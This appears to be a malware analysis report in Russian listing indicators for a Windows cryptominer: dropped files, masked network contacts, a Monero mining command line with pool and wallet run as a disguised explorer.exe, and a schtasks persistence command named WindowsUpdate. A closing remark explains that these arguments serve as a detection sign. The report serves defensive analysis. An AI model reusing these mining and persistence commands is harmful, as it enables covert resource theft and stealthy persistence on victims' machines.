Техническая информация
- <SYSTEM32>\tasks\windowsupdate
- %WINDIR%\explorer.exe
- %LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe
- %TEMP%\winring0x64.sys
- 'ht##bin.org':80
- 'di##ord.com':443
- http://ht##bin.org/ip
- 'di##ord.com':443
- DNS ASK ht##bin.org
- DNS ASK di##ord.com
- '%LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe'
- '%LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe' (со скрытым окном)
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 70 -o xmr-eu1.nanopool.org:14444 -u 4ALmTFkPEAf4jysEzBjQw9eXdpFpoSsBW5n7US7QnzyC539PyFFB6pFUcyBxzy24fSeyztn6kbEo4ZB6oQapob8HA4h69MU.worker -p kay (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn WindowsUpdate /rl HIGHEST /tr %LOCALAPPDATA%\WindowsUpdateVersion-3.3.78\update.exe
- '<SYSTEM32>\taskeng.exe' {A49378D8-02F3-4439-AD7C-13EDF1908967} S-1-5-21-1960123792-2022915161-3775307078-1001:xpkbajdqqv\user:Interactive:[1]
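- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 70 -o xmr-eu1.nanopool.org:14444 -u 4ALmTFkPEAf4jysEzBjQw9eXdpFpoSsBW5n7US7QnzyC539PyFFB6pFUcyBxzy24fSeyztn6kbEo4ZB6oQapob8HA4h69MU.worker -p kay
  (Примечание: аргументы -o и -u задают адрес пула и идентификатор кошелька, то есть под именем системного explorer.exe, по-видимому, выполняется майнер; штатный explorer.exe с такими параметрами не запускается, поэтому подобная командная строка сама по себе является признаком для обнаружения.)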